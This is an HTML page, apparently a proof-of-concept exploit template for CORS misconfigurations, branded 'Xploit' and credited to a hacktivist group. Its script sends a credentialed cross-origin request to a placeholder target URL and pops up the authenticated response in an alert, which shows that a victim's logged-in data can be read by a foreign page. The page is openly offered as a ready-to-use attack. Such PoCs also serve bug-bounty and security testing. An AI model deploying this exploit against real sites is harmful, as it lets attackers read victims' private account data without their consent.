<!DOCTYPE html >
<!--Written by Rohan Mathur at The Hacktivists--!>
<html>
<style>
body {
	background-color: #1d2737;
	background-image: url("images/animated.gif");
	background-repeat: no-repeat;
	background-position: center;
}
.info {
	margin: 50px;
	padding: 0 20px 0 200px;
	font-family: "Times", serif;
	color: white;
	
}
#Exploit
{
	padding: 0 20px 0 200px;
	margin-top: 200px;
	width: 500px;
	text-align: center;
	font-family: "Times", serif;
	color: white;
}
.button {
  background-color: #f9c963;
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 25px;
  margin: 44px 2px;
  cursor: pointer;
  border-radius: 8px;
}

select {
  width: 100%;
  padding: 16px 20px;
  border: none;
  border-radius: 4px;
  background-color: #f1f1f1;
}
input[type=text] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  box-sizing: border-box;
  border-radius: 8px;
}
label {
    color: White;
    font-weight: bold;
    font-size: 40px;
    display: block;
    float: left;
    font-family: "Calibri", Times, serif;
}
</style>
<body>
<br><br>
<marquee scrollamount = 30><font size = 15 COLOR = ORANGE>Xploit </FONT><FONT size = 15 COLOR = WHITE> by </font> <font size = 15 COLOR = GREEN>N1KS3N</font></marquee>
<div class="info">
	<div id="Exploit">
		<font size = 13>CORS POC Exploit</font>
		<div id="demo">
		<button type="submit" onclick="cors()" class="button">Exploit</button>
		</div>
	</div>
			<script>
			function cors() {
			  var xhttp = new XMLHttpRequest();
			  xhttp.onreadystatechange = function() {
				if (this.readyState == 4 && this.status == 200) {
				  document.getElementById("demo").innerHTML = alert(this.responseText);
				}
			  };

xhttp.open("GET", "https://<target-url>", true);
			  xhttp.withCredentials = true;
			  xhttp.send();
			}
		</script>


</body>
</html>